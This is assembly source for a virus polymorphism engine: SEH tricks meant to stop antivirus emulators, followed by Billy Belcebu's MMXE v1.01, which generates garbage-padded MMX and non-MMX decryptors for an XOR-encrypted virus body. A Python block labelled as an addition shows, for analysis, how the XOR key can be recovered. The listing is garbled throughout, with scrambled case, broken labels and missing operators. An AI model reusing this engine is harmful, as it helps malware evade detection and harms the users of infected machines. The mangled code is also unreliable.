Stosb

Call @@choose_aux1_reg

SHL EAX, 3

OR Al, 11000100B

Stosb

Call @@ gen_garbage

MOV AX, 608BH

OR AH, BYTE PTR [EBP @@ reg_aux1]

Stosw

MOV Al, 08H

Stosb

And byte PTR [EBP @@reg_aux1], 00H

RET

Fixing Stack After Fault - Type 3:

Mov REG, [ESP 08H]

; MOV ESP, REG

@@ stack_fix_type3:

MOV Al, 8BH

Stosb

Call @@choose_aux1_reg

SHL EAX, 3

OR Al, 01000100B

Stosb

MOV AX, 0824H

Stosw

Call @@ gen_garbage

MOV Al, 08BH

Stosb

MOV Al, Byte Ptr [EBP @@ reg_aux1]

OR Al, 11100000B

Stosb

And byte PTR [EBP @@reg_aux1], 00H

RET

Fixing Stack After Fault - Type 4:

Mov Reg1, ESP

Mov reg2, [reg1 08h]

; MOV ESP, REG2

@@ stack_fix_type4:

MOV Al, 08BH

Stosb

Call @@choose_aux1_reg

SHL EAX, 3

OR Al, 11000100B

Stosb

Call @@ gen_garbage

Call @@choose_aux2_reg

MOV AX, 408BH

OR AH, BYTE PTR [EBP @@ reg_aux1]

Movzx EBX, Byte Ptr [EBP @@ reg_aux2]

SHL EBX, 3

OR AH, BL

Stosw

MOV Al, 08H

Stosb

Call @@ gen_garbage

MOV Al, 08BH

Stosb

Mov Al, Byte Ptr [EBP @@ reg_aux2]

OR Al, 11100000B

Stosb

And byte PTR [EBP @@reg_aux1], 00H

and byte ptr [ebp+@@reg_aux2], 00h

ret

; ----

Restoring Old SEH HANDLER - TYPE 1:

Pop DWORD PTR FS: [0000H]

@@ SEH_RESTORE_OLD_TYPE1:

Mov Eax, 068F6467H

Stosd

XOR EAX, EAX

Stosw

RET

Restoring Old SEH HANDLER - TYPE 2:

Zero REG

Pop DWORD PTR FS: [REG]

@@ SEH_RESTORE_OLD_TYPE2:

Call @@choose_aux1_reg

CMP Al, _ebp

JZ @@ seh_restore_old_type2

Call @@ gen_zero_reg

Call @@ gen_garbage

MOV AX, 08F64H

Stosw

MOV Al, Byte Ptr [EBP @@ reg_aux1]

Stosb

And byte PTR [EBP @@reg_aux1], 00H

RET

; ----

FIXING Stack Because New Handler - Type 1:

Pop REG

@@ stack_fix_nh_type1:

Call @@choose_aux1_reg

Add Al, 58h

Stosb

And byte PTR [EBP @@reg_aux1], 00H

RET

Fixing Stack Because New Handler - Type 2:

; EQ. Add ESP, 4

@@ stack_fix_nh_type2:

mov byte ptr [ebp+@@reg_aux1], _esp

call @@gen_incpointer

And byte PTR [EBP @@reg_aux1], 00H

RET

; ----

Saving Old SEH HANDLER - TYPE 1:

Push DWORD PTR FS: [0000H]

@@ SEH_SAVE_OLD_TYPE1:

Mov Eax, 36FF6467H

Stosd

XOR EAX, EAX

Stosw

RET

Saving Old SEH HANDLER - TYPE 2:

Zero REG

Push DWORD PTR FS: [REG]

@@ SEH_SAVE_OLD_TYPE2:

Call @@choose_aux1_reg

CMP Al, _ebp

JZ @@ seh_save_old_type2

Call @@ gen_zero_reg

Call @@ gen_garbage

MOV AX, 0FF64H

Stosw

MOV Al, Byte Ptr [EBP @@ reg_aux1]

OR Al, 00110000B

Stosb

And byte PTR [EBP @@reg_aux1], 00H

RET

Saving Old SEH HANDAL - TYPE 3:

; MOV REG, DWORD PTR FS: [0000H]

Push REG

@@ SEH_SAVE_OLD_TYPE3:

Call @@choose_aux1_reg

Mov Eax, 008B6467H

Stosd

Dec Edi

mov al, byte ptr [ebp+@@reg_aux1]

shl eax, 3

OR Al, 00000110B

Stosb

XOR EAX, EAX

Stosw

Call @@ gen_garbage

MOV Al, Byte Ptr [EBP @@ reg_aux1]

Add Al, 50h

Stosb

And byte PTR [EBP @@reg_aux1], 00H

RET

Saving Old SEH HANDLER - TYPE 4:

Zero Reg1

Mov Reg2, DWORD PTR fs: [reg1]

Push Reg2

@@ SEH_SAVE_OLD_TYPE4:

Call @@choose_aux1_reg

CMP Al, _ebp

JZ @@ seh_save_old_type4

Call @@ gen_zero_reg

Call @@ gen_garbage

MOV AX, 8B64H

Stosw

Call @@choose_aux2_reg

SHL EAX, 3

OR Al, Byte PTR [EBP @@ reg_aux1]

Stosb

Call @@ gen_garbage

Mov Al, Byte Ptr [EBP @@ reg_aux2]

Add Al, 50h

Stosb

And byte PTR [EBP @@reg_aux1], 00H

And byte PTR [EBP @@reg_aux2], 00H

RET

; ----

Set New SEH HANDLER TYPE 1:

MOV FS: [0000H], ESP

@@ SEH_Newhnd_Type1:

Mov Eax, 26896467H

Stosd

XOR EAX, EAX

Stosw

RET

Set New SEH HANDLER TYPE 2:

Zero REG

MOV FS: [REG], ESP

@@ SEH_Newhnd_type2:

Call @@choose_aux1_reg

CMP Al, _ebp

JZ @@ seh_newhnd_type2

Call @@ gen_zero_reg

Call @@ gen_garbage

MOV AX, 8964H

Stosw

MOV Al, Byte Ptr [EBP @@ reg_aux1]

OR Al, 00100000B

Stosb

And byte PTR [EBP @@reg_aux1], 00H

RET

TABLES for a Random Construction of SEH Trick for Stop Emulatorz

@@ stack_fix label byte

DD Offset (@@ stack_fix_type1)

DD offset (@@ stack_fix_type2)

DD Offset (@@ stack_fix_type3)

DD offset (@@ stack_fix_type4)

@@s_stack_fix equ (($-offset @@stack_fix)/4)

@@ SEH_RESTORE LABEL BYTE

DD Offset (@@ seh_restore_old_type1)

dd offset (@@seh_restore_old_type2)

@@s_seh_restore equ (($-offset @@seh_restore)/4)

@@ stack_fix_nh label byte

DD Offset (@@ stack_fix_nh_type1)

DD offset (@@ stack_fix_nh_type2)

@@ s_stack_fix_nh EQU (($ -offset @@ stack_fix_nh) / 4)

@@ seh_save_old label byte

DD Offset (@@ seh_save_old_type1)

DD Offset (@@ seh_save_old_type2)

DD Offset (@@ seh_save_old_type3)

DD offset (@@ seh_save_old_type4)

@@s_seh_saveold equ (($-offset @@seh_save_old)/4)

@@ seh_newhnd label byte

DD offset (@@ seh_newhnd_type1)

DD Offset (@@ seh_newhnd_type2)

@@s_seh_newhnd equ (($-offset @@seh_newhnd)/4)

Phire endp

EBLOCK12 Label Byte

;=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=
; [MMXE] - MultiMedia eXtensions Engine v1.01
;=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=

;

; This is a bugfixed and improved version of my MMXE v1.00. Enjoy it!
; PS: of course, this engine is so far away from Mental Driller's code, but
; at least it tries to be poly, huh? :)
;
; Well, the poly decryptor generated with MMXE will be like this one:

;

;       -------------------
;       |  MMX detection  |-------.
;       -------------------       |
;       |  MMX decryptor  |       | [if MMX not detected]
;       -------------------       |
;       |Non-MMX decryptor|<------'
;       ------------------- }
;       |                 | }
;       |   Virus body    | } [this is the encrypted part :)]
;       |                 | }
;       ------------------- }

;

; The generated code doesn't pretend in any way to seem realistic: just the
; opposite. It generates a lot of nonsense (very few executables use MMX op-
; .................

;

; Input:
;   ECX = size of code to encrypt
;   ESI = pointer to the data to encrypt
;   EDI = buffer where to put the decryptor
;   EBP = delta offset
; Output:
;   ECX = decryptor size
;
; All the other registers, preserved.
;

[Default MMXE settings]

Limit EQU 800H; Decryptor Size (2K)

Recursion EQU 05H; The Recursion Level of THME

NGARBAGE EQU 08H; Sorta Level of Garbage

[Registers]

_Eax EQU 00000000B; All these Are Are The Numeric

_Ecx EQU 00000001b; Value of All the registers.

_EDX EQU 00000010b; Heh, I Haven't Used Here

_Ebx equ 00000011b; All this, but ... WTF? They

_ESP EQU 00000100B; Don't waste Bytes, And MA-

_EBP EQU 00000101b; Ke this shit to be more

_Esi Equ 00000110b; Clear :)

_EDI EQU 00000111B;

[Mmx registers]

_MM0 EQU 00000000B

_MM1 EQU 00000001B

_MM2 EQU 00000010B

_MM3 EQU 00000011B

_MM4 EQU 00000100B

_MM5 EQU 00000101B

_MM6 EQU 00000110B

_MM7 EQU 00000111B

[INTERNAL FLAGS]

_check4mmx      equ     0000000000000001b
_deltaoffset    equ     0000000000000010b
_loadsize       equ     0000000000000100b
_loadpointer    equ     0000000000001000b
_loadkey        equ     0000000000010000b
_passkey2mmx    equ     0000000000100000b
_passptr2mmx    equ     0000000001000000b
_crypt          equ     0000000010000000b
_passmmx2ptr    equ     0000000100000000b
_incpointer     equ     0000001000000000b
_deccounter     equ     0000010000000000b
_loop           equ     0000100000000000b

[Positions]

@ CHECK4MMX EQU 00H

@Deltaoffset EQU 01H

@Loadsize EQU 02H

@Loadpointer EQU 03H

@LoadKey EQU 04H

@ Passkey2mmx EQU 05H

@ Passptr2mmx EQU 06H

@Crypt EQU 07h

@ Passmmx2Ptr Equ 08h

@Incpointer EQU 09H

@Deccounter EQU 0AH

@Loop EQU 0BH

[Pushad structure]

Pushad_edi Equ 00H

Pushad_esi EQU 04H

Pushad_EBP EQU 08H

Pushad_esp EQU 0ch

Pushad_ebx EQU 10h

Pushad_edx EQU 14H

Pushad_ecx EQU 18h

pushad_eax equ 1Ch

RETURN_ADDRESS EQU 04H

[Mmxe v1.01]

MMXE Proc

pushad

Call @@ init_mmxe

pushad

Call @@ Crypt_Data

Popad

Call @@ gen_some_garbage

Call @@ Gen_Check4mmx

Call @@ gen_some_garbage

; Generate the 5 parts of the decryptor that go before the loop

@@gb4l_:

Call @@ gen_some_garbage

Call @@ gen_before_loop

@@gb4l?:

movzx ecx, word ptr [ebp+@@flags]

xor ecx, _check4mmx or \   ; check if all flags were
         _deltaoffset or \ ; done... (they should be,
         _loadsize or \    ; but I don't trust in my own
         _loadpointer or \ ; code :)
         _loadkey or \
         _passkey2mmx

jnz @@gb4l_

; Get the loop point

Call @@ getloopaddress

Call @@ gen_some_garbage

; Generate the decryptor instructions that form the loop

Lea ESI, [EBP @@After_loopTBL]

Mov ECX, @@ s_aftlooptbl

@@gal: lodsd

Add Eax, EBP

PUSH ECX ESI

Call EAX

Call @@ gen_some_garbage

POP ESI ECX

Loop @@gal

Mov al, 0e9h

Stosb

Mov Eax, Limit

MOV EBX, EDI

SUB EBX, DWORD PTR [EBP @@ ptr_buffer]

Add ebx, 4

Sub Eax, EBX

Stosd

; And now generate the non-MMX decryptor

Call @@ gen_garbage

mov eax, dword ptr [ebp+@@ptrto2nd]

mov ebx, edi

SUB EBX, EAX

SUB EBX, 4

Mov DWORD PTR [EAX], EBX

and word ptr [ebp+@@flags], 0000h

and byte ptr [ebp+@@init_mmx?], 00h

or word ptr [ebp+@@flags], _check4mmx

@@gb4lx_:

Call @@ gen_some_garbage

call @@gen_before_loop_non_mmx

@@gb4lx?:

movzx ecx, word ptr [ebp+@@flags]

xor ecx, _check4mmx or \   ; check if all flags were
         _deltaoffset or \ ; done... (they should be,
         _loadsize or \    ; but I don't trust in my own
         _loadpointer or \ ; code :)
         _loadkey

jz @@continue_with_this

movzx ecx, word ptr [ebp+@@flags]

xor ecx, _check4mmx or \   ; in strange files, I dunno
         _deltaoffset or \ ; why, instead of 1Fh we must
         _loadsize or \    ; check for 3Fh... otherwise
         _loadpointer or \ ; all goes to hell :(
         _loadkey or \
         _passkey2mmx

jnz @@gb4lx_

@@ Continue_With_THIS:

Call @@ gen_garbage

Call @@ getloopaddress

Lea ESI, [EBP @@After_l00ptbl]

Mov ECX, @@ s_afTL00PTBL

@@galx: lodsd

Add Eax, EBP

PUSH ECX ESI

Call EAX

Call @@ gen_some_garbage

POP ESI ECX

Loop @@galx

Mov al, 0e9h; generate the jmp

Stosb; Decrypted Virus Code

Mov Eax, Limit

MOV EBX, EDI

SUB EBX, DWORD PTR [EBP @@ ptr_buffer]

Add ebx, 04h

Sub Eax, EBX

Stosd

XCHG Eax, Ecx; Fill with Shit The Rest

@@ FillTherest:

Call Random

Stosb

Loop @@ filltherest

Call @@ uninit_mmxe

Popad

RET

DB 00H, "[mmxe v1.01]", 00h

; --- Initialization & Uninitialization Routines

@@ init_mmxe:

MOV DWORD PTR [EBP @@ ptr_data2enc], ESI

MOV DWORD PTR [EBP @@ ptr_buffer], EDI

MOV DWORD PTR [EBP @@ size2enc], ECX

SHR ECX, 2

MOV DWORD PTR [EBP @@ size2cryptd4], ECX

and byte ptr [ebp+@@init_mmx?], 00h

And Word PTR [EBP @@ flags], 00H

Call Random

MOV DWORD PTR [EBP @@ enc_key], EAX

@@ Get_Key:

Mov Eax, 08h

Call R_Range

OR EAX, EAX

JZ @@ get_key

CMP Eax, _esp

JZ @@ get_key

MOV BYTE PTR [EBP @@reg_key], Al

MOV EBX, EAX

@@ get_ptr2data:

Mov Eax, 08h

Call R_Range

OR EAX, EAX

JZ @@ get_ptr2data

CMP Eax, _esp

JZ @@ get_ptr2data

CMP Eax, _ebp

JZ @@ get_ptr2data

CMP EAX, EBX

JZ @@ get_ptr2data

MOV BYTE PTR [EBP @@reg_ptr2data], al

MOV ECX, EAX

@@ get_counter:

Mov Eax, 08h

Call R_Range

OR EAX, EAX

JZ @@ get_counter

CMP Eax, _esp

JZ @@ get_counter

CMP EAX, EBX

JZ @@ get_counter

CMP EAX, ECX

JZ @@ get_counter

MOV BYTE PTR [EBP @@ reg_counter], Al

Mov Edx, EAX

@@ get_delta:

Mov Eax, 08h

Call R_Range

OR EAX, EAX

JZ @@ get_delta

CMP Eax, _esp

JZ @@ get_delta

CMP EAX, EBX

JZ @@ get_delta

CMP EAX, ECX

JZ @@ get_delta

CMP EAX, EDX

JZ @@ get_delta

MOV BYTE PTR [EBP @@ reg_delta], Al

Mov Edx, EAX

@@ get_mmxptr2data:

Mov Eax, 08h

Call R_Range

MOV BYTE PTR [EBP @@ mmx_ptr2data], Al

MOV EBX, EAX

@@ get_mmxkey:

Mov Eax, 08h

Call R_Range

CMP EAX, EBX

JZ @@ get_mmxkey

MOV BYTE PTR [EBP @@ mmx_key], al

MOV DWORD PTR [EDI], "exmm"

RET

@@ uninit_mmxe:

MOV ECX, EDI

SUB ECX, DWORD PTR [EBP @@ Ptr_Buffer]

mov [esp+RETURN_ADDRESS+PUSHAD_ECX], ecx

RET

; --- Who Made this? Ehrm ... Oh, IT WAS me! :)

DB 00H, "[- (c) 1999 Billy Belcebu / Ikx -]", 00H

; - Useful subroutines use by the engine

@@ get_register:

Movzx EBX, Byte Ptr [EBP @@ reg_key]

Movzx ECX, Byte Ptr [EBP @@reg_ptr2data]

Movzx EDX, Byte Ptr [EBP @@reg_counter]

Movzx ESI, BYTE PTR [EBP @@reg_delta]

@@ GR_GET_Another:

Mov Eax, 08h

Call R_Range

CMP Eax, _esp

JZ @@ gr_get_another

CMP EAX, EBX

JZ @@ gr_get_another

CMP EAX, ECX

JZ @@ gr_get_another

CMP EAX, EDX

JZ @@ gr_get_another

CMP EAX, ESI

JZ @@ gr_get_another

CMP Al, Byte PTR [EBP @@ reg_mask]

JZ @@ gr_get_another

RET

@@ get_mmx_register:

Movzx EBX, Byte Ptr [EBP @@ mmx_ptr2data]

Movzx ECX, Byte PTR [EBP @@ mmx_key]

@@gmmxr_get_another:

Mov Eax, 08h

Call R_Range

CMP EAX, EBX

JZ @@gmmxr_get_another

CMP EAX, ECX

JZ @@gmmxr_get_another

RET

@@ clean_mask:

AND BYTE PTR [EBP @@reg_mask], 00H

RET

@@ is_register:

CMP Al, Byte PTR [EBP @@reg_key]

JZ @@ is_used

CMP Al, Byte PTR [EBP @@reg_ptr2data]

JZ @@ is_used

CMP Al, Byte PTR [EBP @@reg_counter]

JZ @@ is_used

CMP Al, Byte PTR [EBP @@ reg_delta]

JZ @@ is_used

CMP Al, Byte PTR [EBP @@ reg_mask]

JZ @@ is_used

MOV CL, 00H

Org $ -1

@@ is_USED:

STC

RET

@@ gen_before_loop:

Mov Eax, 05h

Call R_Range

OR EAX, EAX; 0

JZ @@ try_deltaoffset

Dec Eax; 1

JZ @@ Try_loadsize

Dec Eax; 2

JZ @@ try_loadpointer

Dec Eax; 3

JZ @@ Try_loadkey; 4

JMP @@ TRY_PassKey2MMX; 5

@@ try_deltaoffset:

bt word ptr [ebp+@@flags], @deltaoffset

jc @@gen_before_loop

Call @@ gen_deltaoffset

RET

@@ Try_loadsize:

bt word ptr [ebp+@@flags], @loadsize

JC @@ gen_before_loop

call @@gen_loadsize

RET

@@ try_loadpointer:

bt word ptr [ebp+@@flags], @loadpointer

JC @@ gen_before_loop

Bt Word PTR [EBP @@ flags], @ deltaoffset

JNC @@ gen_before_loop

Call @@ gen_loadpointer

RET

@@ Try_loadkey:

bt word ptr [ebp+@@flags], @loadkey

JC @@ gen_before_loop

call @@gen_loadkey

RET

@@ try_passkey2mmx:

bt word ptr [ebp+@@flags], @passkey2mmx

JC @@ gen_before_loop

bt word ptr [ebp+@@flags], @loadkey

JNC @@ gen_before_loop

Call @@ Gen_PassKey2mmx

RET

@@ gen_before_loop_non_mmx:

Mov Eax, 04h

Call R_Range

OR EAX, EAX; 0

JZ @@ try_deltaoffset_non_mmx

Dec Eax; 1

JZ @@ TRY_LOADSIZE_NON_MMX

Dec Eax; 2

JZ @@ TRY_LOADPOINTER_NON_MMX

JMP @@ TRY_LOADKEY_NON_MMX

@@ try_deltaoffset_non_mmx:

Bt Word PTR [EBP @@ flags], @ deltaoffset

JC @@ gen_before_loop

Call @@ gen_deltaoffset

RET

@@ Try_loadsize_non_mmx:

bt word ptr [ebp+@@flags], @loadsize

JC @@ gen_before_loop

call @@gen_loadsize

RET

@@ try_loadpointer_non_mmx:

bt word ptr [ebp+@@flags], @loadpointer

JC @@ gen_before_loop

Bt Word PTR [EBP @@ flags], @ deltaoffset

JNC @@ gen_before_loop

Call @@ gen_loadpointer

RET

@@ Try_loadKey_non_mmx:

bt word ptr [ebp+@@flags], @loadkey

jc @@gen_before_loop

call @@gen_loadkey

RET

@@ Crypt_Data:

MOV ECX, DWORD PTR [EBP @@ size2cryptd4]

MOV EBX, DWORD PTR [EBP @@ enc_key]

MOV EDI, DWORD PTR [EBP @@ ptr_data2enc]

MOV ESI, EDI

@@ CL00P: LODSD

XOR EAX, EBX

Stosd

Loop @@ CL00P

RET
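As an added example (not code from the page or its author), here is a Python model of the @@crypt_data layer above together with the known-plaintext key recovery an analyst uses against it; the sample buffer and key are constructed. It also covers the edge that `shr ecx, 2` creates: a trailing 1 to 3 bytes of the body are never encrypted, and the key itself is written in the clear into the decryptor by @@gen_loadkey (`push imm32` / `mov reg, imm32`).

```python
import struct

# Constructed sample (not from the page): a 19-byte "body", so the last
# 3 bytes fall outside the dword count the engine encrypts.
SAMPLE_PLAIN = bytes.fromhex("60e8000000005d81ed05104000c39090414243")
SAMPLE_KEY = 0x5A17C3E9   # in the engine this comes from a call to Random


def mmxe_crypt_data(buf: bytes, enc_key: int) -> bytes:
    """Model of @@crypt_data: size2cryptd4 = size >> 2 dwords are XORed with
    the 32-bit key (lodsd / xor eax, ebx / stosd). Any trailing 1..3 bytes
    stay untouched because the dword count is truncated. XOR is its own
    inverse, so the same call decrypts."""
    ndwords = len(buf) >> 2
    out = bytearray(buf)
    for i in range(ndwords):
        off = 4 * i
        (v,) = struct.unpack_from("<I", buf, off)
        struct.pack_into("<I", out, off, v ^ (enc_key & 0xFFFFFFFF))
    return bytes(out)


def recover_key(enc: bytes, known_prefix: bytes) -> int:
    """A single repeating 32-bit XOR key leaks from one known plaintext
    dword: key = cipher_dword ^ plain_dword. Analysts typically know the
    first dword (e.g. a fixed prologue) and need nothing else."""
    if len(known_prefix) < 4 or len(enc) < 4:
        raise ValueError("need at least one full dword of known plaintext")
    (c,) = struct.unpack_from("<I", enc, 0)
    (p,) = struct.unpack_from("<I", known_prefix, 0)
    return c ^ p


def unencrypted_tail_len(size: int) -> int:
    """Bytes left in clear at the end of a body of the given size."""
    return size & 3


if __name__ == "__main__":
    enc = mmxe_crypt_data(SAMPLE_PLAIN, SAMPLE_KEY)
    key = recover_key(enc, SAMPLE_PLAIN[:4])
    print("recovered key: %08X" % key)
    print("clear tail bytes:", unencrypted_tail_len(len(SAMPLE_PLAIN)))
    print("roundtrip ok:", mmxe_crypt_data(enc, key) == SAMPLE_PLAIN)
```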

; --- Garbage Generators

@@ gen_garbage:

Inc Byte PTR [EBP @@ recursion]

CMP BYTE PTR [EBP @@ recursion], Recursion

Jae @@gg_exit

CMP BYTE PTR [EBP @@ @@ it_mmx?], 00H

Ja @@gg_mmx

@@gg_non_mmx:

MOV EAX, @@ non_mmx_gbg

JMP @@gg_doot

@@gg_mmx:

Mov Eax, @@ s_gbgtbl

@@gg_doot:

Call R_Range

Lea EBX, [EBP @@ GBGTBL]

MOV EAX, [EBX EAX * 4]

Add Eax, EBP

Call EAX

@@gg_exit:

Dec byte PTR [EBP @@ recursion]

RET

@@ gen_some_garbage:

Mov ECX, NGARBAGE

@@gsg_l00p:

Push ECX

Call @@ gen_garbage

POP ECX

Loop @@gsg_l00p

RET

; Generates any arithmetic operation between a register and another register:
; ADD / OR / ADC / SBB / AND / SUB / XOR / CMP REG32, REG32

@@ gen_arithmetic_reg32_reg32:

Call Random

And Al, 00111000B; [Add, OR, ADC, SBB, And, Sub, XOR, CMP]

OR Al, 00000011B

Stosb

@@gar32r32:

Call @@ get_register

OR Al, Al

JZ @@gar32r32

SHL EAX, 3

OR Al, 11000000B

Push EAX

Call Random

And Al, 00000111B

XCHG EBX, EAX

POP EAX

OR Al, BL

Stosb

RET

; Generates any arithmetic operation with an immediate and a 32-bit register:
; ADD / OR / ADC / SBB / AND / SUB / XOR / CMP REG32, IMM32

@@ gen_arithmetic_reg32_imm32:

MOV Al, 81H; [Add, OR, ADC, SBB, And, Sub, XOR, CMP]

Stosb

@@ Gar32i32: Call @@ get_register

OR Al, Al

JZ @@gar32i32

Push EAX

Call Random

And Al, 00111000B

OR Al, 11000000B

POP EBX

OR Al, BL

Stosb

Call Random

Stosd

RET

; Generates any arithmetic operation with an immediate and EAX:
; ADD / OR / ADC / SBB / AND / SUB / XOR / CMP EAX, IMM32

@@ gen_arithmetic_eax_imm32:

Call Random

And Al, 00111000B; [Add, OR, ADC, SBB, And, Sub, XOR, CMP]

OR Al, 00000101B

Stosb

Call Random

Stosd

RET

; Generates a MOV immediate to 32-bit register:
; MOV REG32, IMM32

@@ gen_mov_reg32_imm32:

Call @@ get_register

Add Al, 0B8H

Stosb

Call Random

Stosd

RET

; Generates a MOV immediate to 8-bit register:
; MOV REG8, IMM8

@@ gen_mov_reg8_imm8:

Mov Eax, 4

Call R_Range

Call @@ is_register

JC @@ Quitthisshit

Push EAX

MOV Eax, 2

Call R_Range

POP ECX

XCHG EAX, ECX

Jecxz @@ use_msb

@@ put_it:

Add Al, 0B0H

Stosb

Call Random

Stosb

@@ quitthisshit:

RET

@@ USE_MSB:

OR Al, 00000100B

JMP @@ PUT_IT

; Generates calls to subroutines:
;
;       call    @@1
;       [...]
;       jmp     @@2
;       [...]
; @@1:  [...]
;       ret
;       [...]
; @@2:  [...]

@@ gen_call_to_subroutine:

Mov al, 0e8h

Stosb

XOR EAX, EAX

Stosd

Push EDI

Call @@ gen_garbage

Mov al, 0e9h

Stosb

XOR EAX, EAX

Stosd

Push EDI

Call @@ gen_garbage

MOV Al, 0C3H

Stosb

Call @@ gen_garbage

MOV EBX, EDI

POP EDX

SUB EBX, EDX

MOV [EDX-4], EBX

POP ECX

Sub EDX, ECX

MOV [ECX-4], EDX

@@ DO_Anything:

RET

; Generate push / garbage / pop structure (allows recursivity):
;
;       push    reg
;       [...]
;       pop     reg

;

@@ gen_push_garbage_pop:

Mov Eax, 08h

Call R_Range

Add Al, 50h

Stosb

Call @@ gen_garbage

call @@get_register

add al, 58h

Stosb

RET

; MMX group 1:
;
; PUNPCKLBW / PUNPCKLWD / PUNPCKLDQ / PACKSSWB / PCMPGTB / PCMPGTW / PCMPGTD / PACKUSWB
; PUNPCKHBW / PUNPCKHWD / PUNPCKHDQ / PACKSSDW

@@ gen_mmx_group1:

MOV BX, 600FH

MOV Eax, 0Ch

Call R_Range

Add Bh, Al

XCHG EAX, EBX

Stosw

Call @@ build_mmx_gbg_rib

RET

@@ GEN_MMX_MOVQ_MM? _MM ?:

MOV AX, 6F0FH; MOVQ MM?, MM?

Stosw

Call @@ build_mmx_gbg_rib

RET

@@ gen_mmx_movd_mm? _REG32:

MOV AX, 7E0FH; MOVD MM?, E??

Stosw

Call @@ get_mmx_register

SHL EAX, 3

Push EAX

Call @@ get_register

XCHG EAX, EBX

POP EAX

OR Al, BL

OR Al, 11000000B

Stosb

RET

; MMX group 2:
;
; PCMPEQB / PCMPEQW / PCMPEQD

@@ gen_mmx_group2:

Mov Al, 0FH

Stosb

Mov Eax, 3

Call R_Range

Add Al, 74H

Stosb

Call @@ build_mmx_gbg_rib

RET

; MMX group 3:
;
; PSRLW / PSRLD / PSRLQ / PMULLW / PSUBUSB / PSUBUSW / PAND / PADDUSB / PADDUSW / PANDN / PSRAW
; PSRAD / PMULHW / PSUBSB / PSUBSW / POR / PADDSB / PADDSW / PXOR / PSLLW / PSLLD / PSLLQ / PMADDWD

@@ gen_mmx_group3:

Mov Al, 0FH

Stosb

call @@__overshit

@@ eoeo: DB 0D1H, 0D2H, 0D3H, 0D5H, 0D8H, 0D9H, 0DBH, 0DCH, 0DDH, 0DFH

DB 0e1h, 0e2h, 0e5h, 0e8h, 0e9h, 0ebh, 0ech, 0edh, 0efh

DB 0F1H, 0F2H, 0F5H

SG3TBL EQU ($ -offset @@ eoeo)

@@__overshit:

POP ESI

MOV EAX, SG3TBL

Call R_Range

Mov Al, Byte PTR [ESI EAX]

Stosb

Call @@ build_mmx_gbg_rib

@@gmmx_goaavy:

RET

@@ build_mmx_gbg_rib:

Call @@ get_mmx_register

SHL EAX, 3

Push EAX

Call @@ get_mmx_register

XCHG EAX, EBX

POP EAX

OR EAX, EBX

OR Al, 11000000B

Stosb

RET

; Generate one-byters:
;
; CLD / CMC / SALC / NOP / LAHF / INC EAX / DEC EAX / SAHF / (F)WAIT / CWDE

@@ Gen_onebyter:

Call @@ Go_OVERSHIT

db 0FCh, 0F5h, 0D6h, 90h, 9Fh, 40h, 48h, 9Eh, 9Bh, 98h

@@go_overshit:

POP ESI

Mov Eax, 0ah

Call R_Range

Mov Al, Byte PTR [ESI EAX]

Stosb

RET

; Generate many possible ways to make a given register be 0:
;
; XOR REG,REG / SUB REG,REG / PUSH 0 POP REG / AND REG,0 / MOV REG,0 / OR REG,-1 INC REG

@@ gen_zer0_reg:

Call @@ get_register; for garbage generators

@@ gen_zero_reg:

Push EAX

Mov Eax, 06h

Call R_Range

POP ECX

XCHG EAX, ECX

Jecxz @@ xor_reg_reg

Dec ECX

Jecxz @@ sub_reg_reg

Dec ECX

JECXZ @@ push_0_pop_reg

Dec ECX

JECXZ @@ and_reg_0

Dec ECX

JECXZ @@ mov_reg_0

@@ or_reg_m1_inc_reg:

Push EAX

CMP Al, _eax

JNZ @@ or_reg_m1

@@ or_eax_m1:

MOV Al, 0dH; or Eax, -1

Stosb

XOR EAX, EAX

Dec EAX

Stosd

JMP @@ om1ir_inc_reg

@@ or_reg_m1:

XCHG EAX, EBX

MOV AX, 0C883H; Or REG, -1

OR AH, BL

Stosw

XOR EAX, EAX

Dec EAX

Stosb

XCHG EAX, EBX

@@ om1ir_inc_reg:

POP EAX

Add Al, 40h; Inc REG

Stosb

RET

@@ XOR_REG_REG:

XCHG EAX, EBX

MOV AX, 0C033H; XOR REG, REG

OR AH, BL

SHL EBX, 3

OR AH, BL

Stosw

RET

@@ sub_reg_reg:

XCHG EAX, EBX

MOV AX, 0C02BH; Sub Reg, REG

OR AH, BL

SHL EBX, 3

OR AH, BL

Stosw

RET

@@ Push_0_POP_REG:

Push EAX

MOV AX, 006AH; Push 00h

Stosw; POP REG

POP EAX

Add Al, 58h

Stosb

RET

@@ and_reg_0:

CMP Al, _eax

JNZ @@ and_regnoteax_0

@@ and_eax_0:

MOV Al, 25h

Stosb

XOR EAX, EAX

Stosd

RET

@@ and_regnoteax_0:

XCHG EAX, EBX

MOV AX, 0E083H; and reg, 00

OR AH, BL

Stosw

XOR EAX, EAX

Stosb

RET

@@ mov_reg_0:

Add Al, 0B8H; MOV REG, 00000000

Stosb

XOR EAX, EAX

Stosd

RET

; --- Decryptor Code Generators

; Generate the routine to check for MMX presence, which should perform exactly
; the same action as the following code:
;
;       mov     eax,1
;       cpuid
;       bt      edx,17h
;       jnc     not_mmx

@@ Gen_Check4mmx:

Mov Eax, 08h

Call R_Range

XCHG EAX, ECX

jecxz @@c4mmx_a_@@1

dec ecx

jecxz @@c4mmx_a_@@2

dec ecx

jecxz @@c4mmx_a_@@3

dec ecx

jecxz @@c4mmx_a_@@4

dec ecx

jecxz @@c4mmx_a_@@5

dec ecx

jecxz @@c4mmx_a_@@6

dec ecx

jecxz @@c4mmx_a_@@7

@@c4mmx_a_@@8:

XOR Eax, Eax; Zero EAX

Call @@ gen_zero_reg; Sub Eax, -1

MOV Al, 2DH

Stosb

XOR EAX, EAX

Dec EAX

Stosd

JMP @@ C4mmx_Over_a

@@c4mmx_a_@@7:

XOR Eax, Eax; Zero EAX

Call @@ gen_zero_reg; add eax, 1

MOV Al, 05H

Stosb

XOR EAX, EAX

INC EAX

Stosd

JMP @@ C4mmx_Over_a

@@c4mmx_a_@@6:

XOR Eax, Eax; Zero EAX

Call @@ gen_zero_reg; STC

MOV AX, 1DF9H; SBB EAX, -2

Stosw

XOR EAX, EAX

Dec EAX

Dec EAX

Stosd

JMP @@ C4mmx_Over_a

@@c4mmx_a_@@5:

XOR Eax, Eax; Zero EAX

Call @@ gen_zero_reg; STC

MOV AX, 15F9H; ADC EAX, 00000000

Stosw

XOR EAX, EAX

Stosd

JMP @@ C4mmx_Over_a

@@c4mmx_a_@@4:

